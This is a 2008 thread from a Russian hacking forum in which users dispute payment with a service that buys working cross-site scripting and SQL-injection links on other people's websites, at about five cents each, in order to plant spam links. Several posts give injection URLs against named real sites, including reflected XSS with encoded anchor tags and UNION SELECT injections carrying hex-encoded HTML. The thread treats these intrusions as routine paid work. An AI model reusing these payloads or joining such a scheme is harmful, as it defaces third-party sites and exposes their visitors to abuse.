ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.03.2008, 13:07
|
|
Новичок
Регистрация: 19.02.2008
Сообщений: 7
Провел на форуме:
92696
Репутация:
11
|
|
Сообщение от 0nep@t0p
Очень странно, я отправил более 100 xss, и модератор отобрал только 3(!) из них, посчитав остальные неживыми, хотя я только что в случайном порядке отобрал некоторые из этих "неживых" ссылок, они прекрасно работали, в чем проблема ?
Динамят вас, еще не поняли чтоле
|
|
|
18.03.2008, 13:54
|
|
Познающий
Регистрация: 15.01.2008
Сообщений: 42
Провел на форуме:
53734
Репутация:
17
|
|
0nep@t0p, случаем хсс у тебя не того вида, что я показал в предыдущем сообщении?  |
|
|
|
18.03.2008, 14:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311
Репутация:
1676
|
|
Очень странно, я отправил более 100 xss, и модератор отобрал только 3(!) из них, посчитав остальные неживыми, хотя я только что в случайном порядке отобрал некоторые из этих "неживых" ссылок, они прекрасно работали, в чем проблема ?
Выложи пример xss которые посчитали неживыми
|
|
|
|
18.03.2008, 15:32
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
2 Kaimi
Ссылки были правильного вида, все одинаковые, и везде в теле страницы отображался TESTANCHOR, но только 3 из них заапрувили, а остальные ( совершенно одинаковые, найденные через одну и ту же багу ) посчитали неживыми, и саппорт не отвечает =/
2 unixfan
По-моему именно такого вида ссылки и нужны
2 void //tPORt
Ну по крайней мере первые 5 центов, заработанные до введения функции баланса, были исправно высланы на wm кошелек ^_^
Последний раз редактировалось 0nep@t0p; 18.03.2008 в 15:38..
|
|
|
|
18.03.2008, 15:52
|
|
Новичок
Регистрация: 11.04.2005
Сообщений: 7
Провел на форуме:
79502
Репутация:
3
|
|
Сообщение от 0nep@t0p
Очень странно, я отправил более 100 xss, и модератор отобрал только 3(!) из них, посчитав остальные неживыми, хотя я только что в случайном порядке отобрал некоторые из этих "неживых" ссылок, они прекрасно работали, в чем проблема ?
Цитата
"ВНИМАНИЕ!
К оплате принимаются ссылки только в таком виде:
http://majordomo.ru/order/domenfree.php?n=%3Ca%20href=http://TESTDOMAIN%3ETESTANCHOR%3C/a%3E&z=spb.ru
Т.е. наличие TESTDOMAIN и TESTANCHOR в тексте ссылки обязательно. В противном случае сервис оставляет за собой право не оплачивать ссылку."
Ваши ссылки были sql-inj, с кодированым текстом
http://www.wellness-hall.ru/news.php?num=-4+union+select+1,2,0x3C6120687265663D687474703A2F2 F54455354444F4D41494E3E54455354414E43484F523C2F613 E,4,5/*
Последний раз редактировалось Fan; 18.03.2008 в 15:55..
|
|
|
|
18.03.2008, 15:58
|
|
Новичок
Регистрация: 11.04.2005
Сообщений: 7
Провел на форуме:
79502
Репутация:
3
|
|
Сообщение от unixfan
А интересуют ли Вас хсс вида:
http://site.ru/script.php?url=<a href="http://TESTDOMAIN">TESTANCHOR</a>
или такие с "a href=" интереса не представляют? представляет
|
|
|
|
18.03.2008, 16:55
|
|
Новичок
Регистрация: 19.02.2008
Сообщений: 7
Провел на форуме:
92696
Репутация:
11
|
|
2 0nep@t0p
Когда накопицо нормальное количество xss они из ста будуд всегда принемать 3, а как думоешь что они будуд делать с остальными? Удалять их? Да так же будуд юзать, только не заплатив за них тому, кто их преслал.
|
|
|
|
18.03.2008, 17:09
|
|
Новичок
Регистрация: 11.04.2005
Сообщений: 7
Провел на форуме:
79502
Репутация:
3
|
|
Сообщение от void //tPORt
2 0nep@t0p
Когда накопицо нормальное количество xss они из ста будуд всегда принемать 3, а как думоешь что они будуд делать с остальными? Удалять их? Да так же будуд юзать, только не заплатив за них тому, кто их преслал.
Выигрывать копейки, проигрывая в количестве нормальных юзеров - нам не выгодно.
Все кто добавляет в нормальном виде как сказано в правилах - всем платим.
Политика сервиса не обсуждается, правила есть правила. Кому не нравится - может не сотрудничать.
|
|
|
|
18.03.2008, 17:13
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 70
Провел на форуме:
1214722
Репутация:
676
|
|
С парнями приятно работать, все по честноку, все ваши проблемы связаны с невнимательностью а не проблемами сервиса. |
|
|
|
18.03.2008, 17:14
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
2 Fan
Все бы правильно, вот только зачем вы тогда аппрувили мои самые первые ссылки с закодированным тесктом, это раз
А во-вторых, вот отрывки логов наших переговоров в асе -
Код:
Anger (22:48:00 16/03/2008)
дело вот в чем - вам обязательно нужно чтобы в тексте ссылки присутствовало http://TESTDOMAIN%3ETESTANCHOR%3C/a%3E ?
10402 (22:48:50 16/03/2008)
нам нужно чтобы ссылка с доменом TESTDOMAIN и TESTANCHOR живой отображалась на вашем сайте
Anger (22:49:06 16/03/2008)
или важно, чтобы на самой странице отображалось TESTANCHOR а сам текст ссылки не важен ?
10402 (22:49:09 16/03/2008)
например как тут
10402 (22:49:09 16/03/2008)
http://www.1c.ru/rus/partners/goodsearch.jsp?text=%22%3E%3Ca%20href=http://TESTDOMAIN%3ETESTANCHOR%3C/a%3E
Anger (22:49:19 16/03/2008)
ок, ясно
10402 (22:49:20 16/03/2008)
> или важно, чтобы на самой странице отображалось TESTANCHOR а сам текст ссылки не важен ?
именно так
Anger (22:49:49 16/03/2008)
я сейчас кину пример, а вы посмотрите подойдет он или нет, ок ? :)
10402 (22:49:54 16/03/2008)
сейчас движок правим, добавим функцию баланса.
выплаты чуть задержутся, будут ближе к ночи по мск.
удачной работы)
Anger (22:50:08 16/03/2008)
я читал на форуме ачата =)
10402 (22:50:57 16/03/2008)
ок
10402 (22:50:59 16/03/2008)
=)
Anger (22:51:25 16/03/2008)
к примеру вот - http://www.wellness-hall.ru/news.php?num=-4+union+select+1,2,0x3C6120687265663D687474703A2F2F54455354444F4D41494E3E54455354414E43484F523C2F613E,4,5/*
Anger (22:51:31 16/03/2008)
подойдет ?
10402 (22:52:07 16/03/2008)
угу :)
...
10402 (17:49:15 18/03/2008)
ВНИМАНИЕ!
К оплате принимаются ссылки только в таком виде:
http://majordomo.ru/order/domenfree.php?n=%3Ca%20href=http://TESTDOMAIN%3ETESTANCHOR%3C/a%3E&z=spb.ru
Т.е. наличие TESTDOMAIN и TESTANCHOR в тексте ссылки обязательно. В противном случае сервис оставляет за собой право не оплачивать ссылку.
Anger (17:49:32 18/03/2008)
хммм, так вы же вчера сами говорили
Anger (17:49:49 18/03/2008)
что и скуль инж принимается
Anger (17:50:14 18/03/2008)
Anger (22:51:25 16/03/2008)
к примеру вот - http://www.wellness-hall.ru/news.php?num=-4+union+select+1,2,0x3C6120687265663D687474703A2F2F54455354444F4D41494E3E54455354414E43484F523C2F613E,4,5/*
Anger (22:51:31 16/03/2008)
подойдет ?
10402 (22:52:07 16/03/2008)
угу :)
10402 (17:50:29 18/03/2008)
цитатту будьте добры
Anger (17:50:39 18/03/2008)
выше
Anger (17:51:15 18/03/2008)
?
10402 (17:51:53 18/03/2008)
правила приема есть на сайте, я смотрю исключительно есть ли живая ссылка или нет. тут есть.
Anger (17:52:33 18/03/2008)
адрес сайта, где правила приема ?
10402 (17:53:17 18/03/2008)
antichat.ru
10402 (17:53:29 18/03/2008)
http://forum.antichat.ru/threadnav64452-1-10.html
10402 (17:53:30 18/03/2008)
первый топик
10402 (17:53:34 18/03/2008)
читаем внимательно
Anger (17:53:37 18/03/2008)
ну давайте я вам кину пару ссылок, которые вы незаапрувили, но тем не менее в стрраницах есть ссылка на тэстдомайн
10402 (17:53:53 18/03/2008)
скидывай
Anger (17:54:17 18/03/2008)
сейчас, зайду... джпиарэс знаете ли :)
10402 (17:55:32 18/03/2008)
ок
Anger (17:57:57 18/03/2008)
http://team-rs.ru/member.php?id=-4%2527+union+select+1,2,3,4,5,6,0x3C6120687265663D687474703A2F2F54455354444F4D41494E3E54455354414E43484F523C2F613E,8,9,10/* $0.05 declined
Не живая ссылка. Ссылка должна отображаться в содержании сайта.
Anger (17:58:00 18/03/2008)
http://rus-waphost.ru/news/komm.php?ides=1'%20union+select+1,2,0x3C6120687265663D687474703A2F2F54455354444F4D41494E3E54455354414E43484F523C2F613E,4,5/* $0.05 declined
Не живая ссылка. Ссылка должна отображаться в содержании сайта.
10402 (17:58:28 18/03/2008)
ну
10402 (17:59:26 18/03/2008)
кодированный текст
Anger (17:59:34 18/03/2008)
они рабочие, при переходе на них на странице отображается TESTANCHOR с ссылкой на testdomain, но вы почему то их посчитали их неживыми
Anger (17:59:55 18/03/2008)
вы же сами говорили что главное, не ссылка, а надпись в теле страницы
Anger (18:01:30 18/03/2008)
тем более некоторые ссылки тоже были закодированы но вы их купили
Anger (18:02:24 18/03/2008)
ау
10402 (18:02:30 18/03/2008)
косяк модераторов, потом им сказали чтобы такие не апрувили
Anger (18:03:40 18/03/2008)
ну тогда хотя бы запрувте мои, ведь ВЫ же сами сказали что такие принимаются позавчера, а сегодня говорите, что - нет, это не есть хорошо =/
10402 (18:04:21 18/03/2008)
добавляйте в нормальном виде - заапрувим с удовольствием
Anger (18:06:19 18/03/2008)
ну последние закодированные примите, ведь я не был предупрежден что такие не принимаются, вы сами дали добро на закодированные ссылки, а если вы вчера говорили одно, а сегодня другое, то это уже обман
Это что за нафиг, если сегодня одно, а завтра другое ? Вы - поддержка и должны отвечать за слова. |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
